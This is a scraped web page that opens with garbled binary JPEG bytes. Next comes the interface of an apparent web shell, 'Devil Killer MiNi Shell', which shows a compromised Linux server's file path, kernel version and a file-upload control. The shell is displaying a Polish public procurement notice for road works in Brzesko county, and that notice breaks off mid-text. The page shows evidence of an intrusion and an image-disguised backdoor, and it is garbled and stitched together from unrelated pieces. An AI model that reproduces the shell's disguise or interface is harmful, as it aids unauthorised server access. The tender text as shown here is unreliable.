JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220524/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220524/0017434601-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Zagospodaro poscalen wsi Wola Przemykows gm. Szczurowa bud. drógD28 D42, bud. i moder drógD2(0+000-0+070)(0+070-0+660), D4(0+000-0+405)(0+405-0+467), D34(0+000-0+070)(0+070-0+559) oraz moder drogi D55 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Brzeski - Starostwo Powiatowe w Brzesku</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 851665060</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Głowackiego 51</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Brzesko</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-800</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL217 - Tarnowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 6633111</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@powiatbrzeski.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.powiatbrzeski.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zagospodaro poscalen wsi Wola Przemykows gm. Szczurowa bud. drógD28 D42, bud. i moder drógD2(0+000-0+070)(0+070-0+660), D4(0+000-0+405)(0+405-0+467), D34(0+000-0+070)(0+070-0+559) oraz moder drogi D55 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1e39e988-db49-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00174346</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-05-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001280/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Zagospodarowanie poscaleniowe wsi Wola Przemykowska, gmina Szczurowa – budowa, modernizacja dróg</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.zamowienia.powiatbrzeski.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl 1.	W niniejszym postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu miniPortalu dostępnego pod adresem https://miniportal.uzp.gov.pl/, ePUAPu dostępnego pod adresem https://epuap.gov.pl/wps/portal oraz poczty elektronicznej - przetargi@powiatbrzeski.pl.<br/>2.	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie niniejszego zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty” oraz do „Formularza do komunikacji”.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">2.	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie niniejszego zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty” oraz do „Formularza do komunikacji”.<br/>3.	Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej ePUAP.<br/>4.	Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy „Formularz do: złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB. <br/>5.	Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP Zamawiającego.<br/>6.	Adres skrzynki Powiatu Brzeskiego – Starostwa Powiatowego w Brzesku na ePUAP: 0398dqqqoz/skrytka <br/>7.	Identyfikator postępowania: wskazany został w Rozdz.IX ust. 7 SWZ<br/> Dane postępowanie można wyszukać również na Liście wszystkich postępowań w miniPortalu klikając wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki Postępowania.<br/>8.	Adres strony internetowej, na której udostępniane będą zmiany i wyjaśnienia treści specyfikacji warunków zamówienia (SWZ) oraz inne dokumenty zamówienia bezpośrednio związane z postępowaniem o udzielenie zamówienia: zamowienia.powiatbrzeski.pl 1.	W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym a Wykonawcami w szczególności składanie oświadczeń, wniosków (innych niż wskazane w Rozdz. XII SWZ), zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem dedykowanego formularza „Formularz do komunikacji” dostępnego na ePUAP oraz udostępnionego przez miniPortal. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia BZP lub ID postępowania.<br/>2.	Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej, email przetargi@powiatbrzeski.pl (nie dotyczy składania oferty).<br/>3.	Dokumenty elektroniczne, składane są przez Wykonawcę za pośrednictwem „Formularza do komunikacji” jako załączniki. Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych za pomocą poczty elektronicznej, na wskazany w ust. 2 adres email. Sposób sporządzenia dokumentów elektronicznych musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020 poz. 2452) oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 poz. 2415).<br/>Oferta musi być sporządzona w języku polskim, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/> Zamawiający dopuszcza przesyłanie danych w formatach dopuszczonych odpowiednimi przepisami prawa, tj. m.in. w formatach: pdf, .doc, .docx, .odt, .odp, .jpg, .png, .rtf, kompresja danych : .zip, .7Z, .tar, .gz. (Rozporządzenie Rady Ministrów z dnia 12 kwietnia 2012 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych)</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">informacje zostały wskazane w Rozdz XXIII SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ABR.272.4.2022.MŚ</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">6</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3.	Część I zamówienia - budowa i modernizacja drogi nr D-2 (0+000-0+070) (0+070-0+660) o długości 660 m<br/><br/>1)	Szczegółowy opis przedmiotu zamówienia zawiera dokumentacja projektowa, specyfikacja techniczna wykonania i odbioru robót, przedmiar robót, stanowiąca załącznik Nr 1 do niniejszej SWZ oraz decyzja nr 601/2019 z dnia 31 lipca 2019 r. o zatwierdzeniu projektu budowlanego i udzieleniu pozwolenia na budowę stanowiąca załącznik nr 14 do SWZ oraz Warunki techniczne usunięcia kolizji sieci elektroenergetycznej TAURON Dystrybucja Spółka Akcyjna z dnia 17.01.2019 r. stanowiące załącznik nr 15 do SWZ, Warunki techniczne przebudowy odcinków sieci gazowej Polska Spółka Gazownictwa Sp. z o.o. z dnia 26.03.2019 r. stanowiące załącznik nr 16 do SWZ. <br/>2)	Wykonawca własnym staraniem i na własny koszt zobowiązany jest do:<br/>a)	odbioru placu budowy i jego zabezpieczenia;<br/>b)	urządzenia i zagospodarowania placu budowy oraz zorganizowania zaplecza budowy;<br/>c) ubezpieczenia w zakresie odpowiedzialności cywilnej z tytułu szkód, które mogą zaistnieć w trakcie realizacji przedmiotu niniejszej umowy;<br/>d)	zapewnienia własnym staraniem i na własny koszt Kierownika budowy oraz kierowników robót branżowych;<br/>e)	prowadzenia robót budowlanych z zachowaniem należytego porządku, a po ich zakończeniu do uporządkowania terenu budowy (przywrócenie go do stanu pierwotnego) i przekazania go Zamawiającemu w terminie ustalonym na odbiorze końcowym;<br/>f)	bieżącego utrzymywania porządku na miejscu objętym pracami, zapewnienia prawidłowej organizacji robót oraz wykonania robót zabezpieczających;<br/>g)	informowania Zamawiającego / Inspektora nadzoru/nadzór archeologiczny np. poprzez wpis do dziennika budowy, o terminie wykonania/odbioru robót zanikających oraz zakrycia robót ulegających zakryciu, z wyprzedzeniem umożliwiającym ich sprawdzenie tj. 3 dni robocze. O powyższym fakcie Wykonawca niezwłocznie powiadomi Zamawiającego / Inspektora nadzoru/nadzór archeologiczny. Przystąpienie do sprawdzenia nastąpi nie później niż w ciągu 3 dni roboczych od daty powiadomienia. Jeżeli Wykonawca nie dokonał powiadomienia, o którym mowa powyżej zobowiązany jest odkryć roboty lub wykonać inne czynności niezbędne do zbadania robót, a następnie przywrócić roboty do stanu poprzedniego na własny koszt;<br/>h)	dostarczania Zamawiającemu / Inspektorowi nadzoru bez dodatkowego wzywania wszystkich wymaganych prawem atestów, certyfikatów i specyfikacji technicznych na zastosowane materiały, pod rygorem odmowy dokonania przez Zamawiającego odbioru robót wykonanych przez Wykonawcę;<br/>i)	umożliwiania wstępu na teren budowy pracownikom Państwowego Nadzoru Budowlanego, oraz innych uprawnionych osób, do których należy wykonanie zadań określonych przepisami prawa oraz do udostępnienia im danych i informacji wymaganych prawem, a dotyczących prowadzonych na budowie robót;<br/>j)	natychmiastowego wykonania robót zabezpieczających w przypadku groźby katastrofy budowlanej lub zniszczeń oraz niezwłocznego powiadomienia o tym fakcie Zamawiającego/ Inspektora nadzoru;<br/>k)	prowadzenia robót w sposób nie powodujący uszkodzeń infrastruktury naziemnej i podziemnej oraz mienia osób trzecich, a w przypadku powstania jakiejkolwiek szkody do jej naprawienia;<br/>l)	prowadzenia na bieżąco dziennika budowy;<br/>m)	przerwania prac na żądanie Zamawiającego i w związku z tym zabezpieczenia wykonanych robót przed ich zniszczeniem;<br/>n)	zapewnienia stosownej obsługi geodezyjnej realizowanych robót budowlanych oraz do odtworzenia punktów osnowy geodezyjnej w przypadku ich zniszczenia;<br/><br/>3) Jeżeli do wykonania przedmiotu zamówienia niezbędne będzie:<br/>a) wejście w teren lub korzystanie z innych nieruchomości lub obiektów osób trzecich, Wykonawca zobowiązany jest uzyskać stosowną zgodę ich właścicieli, uzgodnić zakres i terminy korzystania z nich oraz ponieść wszystkie koszty z tym związane;<br/>b) zajęcie pasa drogowego, Wykonawca zobowiązany jest uzyskać stosowną zgodę zarządcy drogi, opracować projekt tymczasowej organizacji ruchu na czas budowy oraz ponieść wszystkie koszty z tym związane.<br/>4) Roboty budowlane stanowiące przedmiot zamówienia Wykonawca wykona zgodnie z decyzją nr 601/2019 z dnia 31 lipca 2019 r. o zatwierdzeniu projektu budowlanego i udzieleniu pozwolenia na budowę i Warunkami technicznymi usunięcia kolizji sieci elektroenergetycznej TAURON Dystrybucja Spółka Akcyjna z dnia 17.01.2019 r., Warunkami technicznymi przebudowy odcinków sieci gazowej Polska Spółka Gazownictwa Sp. z o.o. z dnia 26.03.2019 r. oraz z materiałów własnych tj. wyrobów dopuszczonych do stosowania w budownictwie w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2021 r. poz. 2351 z późn. zm.) oraz ustawy z dnia 16 kwietnia 2004 r. o wyrobach budowlanych (Dz. U. z 2021 r. poz. 1213).<br/>5) Wykonawca na przedmiot umowy udziela gwarancji na okres nie krótszy niż 36 miesięcy licząc od daty dokonania bezusterkowego odbioru końcowego przedmiotu umowy.<br/>6) Rękojmia za wady przedmiotu umowy wynosi 60 miesięcy liczonych od daty dokonania bezusterkowego odbioru końcowego przedmiotu umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45112000-5 - Roboty w zakresie usuwania gleby</p> <p class="mb-0">45233140-2 - Roboty drogowe</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei; wyrównywanie terenu</p> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <p class="mb-0">45232310-8 - Roboty budowlane w zakresie linii telefonicznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający udzieli zamówienia Wykonawcy, którego oferta:<br/>- odpowiada wszystkim wymaganiom przedstawionym w ustawie Pzp,<br/>- odpowiada wszystkim wymaganiom przedstawionym w SWZ,<br/>- została uznana za najkorzystniejszą w oparciu o podane kryteria wyboru.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin wykonania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 4.	Cześć II - budowa i modernizacja drogi nr D-4 (0+000-0+405) (0+405-0+467) o długości 467 m<br/><br/>1)	Szczegółowy opis przedmiotu zamówienia zawiera dokumentacja projektowa, specyfikacja techniczna wykonania i odbioru robót, przedmiar robót, stanowiąca załącznik Nr 1 do niniejszej SWZ oraz decyzja nr 601/2019 z dnia 31 lipca 2019 r. o zatwierdzeniu projektu budowlanego i udzieleniu pozwolenia na budowę stanowiąca załącznik nr 14 do SWZ oraz Warunki techniczne usunięcia kolizji sieci elektroenergetycznej TAURON Dystrybucja Spółka Akcyjna z dnia 17.01.2019 r. stanowiące załącznik nr 15 do SWZ, <br/>2)	Wykonawca własnym staraniem i na własny koszt zobowiązany jest do:<br/>a)	odbioru placu budowy i jego zabezpieczenia;<br/>b)	urządzenia i zagospodarowania placu budowy oraz zorganizowania zaplecza budowy;<br/>c) ubezpieczenia w zakresie odpowiedzialności cywilnej z tytułu szkód, które mogą zaistnieć w trakcie realizacji przedmiotu niniejszej umowy;<br/>d)	zapewnienia własnym staraniem i na własny koszt Kierownika budowy oraz kierowników robót branżowych;<br/>e)	prowadzenia robót budowlanych z zachowaniem należytego porządku, a po ich zakończeniu do uporządkowania terenu budowy (przywrócenie go do stanu pierwotnego) i przekazania go Zamawiającemu w terminie ustalonym na odbiorze końcowym;<br/>f)	bieżącego utrzymywania porządku na miejscu objętym pracami, zapewnienia prawidłowej organizacji robót oraz wykonania robót zabezpieczających;<br/>g)	informowania Zamawiającego / Inspektora nadzoru np. poprzez wpis do dziennika budowy, o terminie wykonania/odbioru robót zanikających oraz zakrycia robót ulegających zakryciu, z wyprzedzeniem umożliwiającym ich sprawdzenie tj. 3 dni robocze. O powyższym fakcie Wykonawca niezwłocznie powiadomi Zamawiającego / Inspektora nadzoru. Przystąpienie do sprawdzenia nastąpi nie później niż w ciągu 3 dni roboczych od daty powiadomienia. Jeżeli Wykonawca nie dokonał powiadomienia, o którym mowa powyżej zobowiązany jest odkryć roboty lub wykonać inne czynności niezbędne do zbadania robót, a następnie przywrócić roboty do stanu poprzedniego na własny koszt;<br/>h)	dostarczania Zamawiającemu / Inspektorowi nadzoru bez dodatkowego wzywania wszystkich wymaganych prawem atestów, certyfikatów i specyfikacji technicznych na zastosowane materiały, pod rygorem odmowy dokonania przez Zamawiającego odbioru robót wykonanych przez Wykonawcę;<br/>i)	umożliwiania wstępu na teren budowy pracownikom Państwowego Nadzoru Budowlanego, oraz innych uprawnionych osób, do których należy wykonanie zadań określonych przepisami prawa oraz do udostępnienia im danych i informacji wymaganych prawem, a dotyczących prowadzonych na budowie robót;<br/>j)	natychmiastowego wykonania robót zabezpieczających w przypadku groźby katastrofy budowlanej lub zniszczeń oraz niezwłocznego powiadomienia o tym fakcie Zamawiającego/ Inspektora nadzoru;<br/>k)	prowadzenia robót w sposób nie powodujący uszkodzeń infrastruktury naziemnej i podziemnej oraz mienia osób trzecich, a w przypadku powstania jakiejkolwiek szkody do jej naprawienia;<br/>l)	prowadzenia na bieżąco dziennika budowy;<br/>m)	przerwania prac na żądanie Zamawiającego i w związku z tym zabezpieczenia wykonanych robót przed ich zniszczeniem;<br/>n)	zapewnienia stosownej obsługi geodezyjnej realizowanych robót budowlanych oraz do odtworzenia punktów osnowy geodezyjnej w przypadku ich zniszczenia;<br/><br/>3) Jeżeli do wykonania przedmiotu zamówienia niezbędne będzie:<br/>a) wejście w teren lub korzystanie z innych nieruchomości lub obiektów osób trzecich, Wykonawca zobowiązany jest uzyskać stosowną zgodę ich właścicieli, uzgodnić zakres i terminy korzystania z nich oraz ponieść wszystkie koszty z tym związane;<br/>b) zajęcie pasa drogowego, Wykonawca zobowiązany jest uzyskać stosowną zgodę zarządcy drogi, opracować projekt tymczasowej organizacji ruchu na czas budowy oraz ponieść wszystkie koszty z tym związane.<br/>4) Roboty budowlane stanowiące przedmiot zamówienia Wykonawca wykona zgodnie z decyzją nr 601/2019 z dnia 31 lipca 2019 r. o zatwierdzeniu projektu budowlanego i udzieleniu pozwolenia na budowę i Warunkami technicznymi usunięcia kolizji sieci 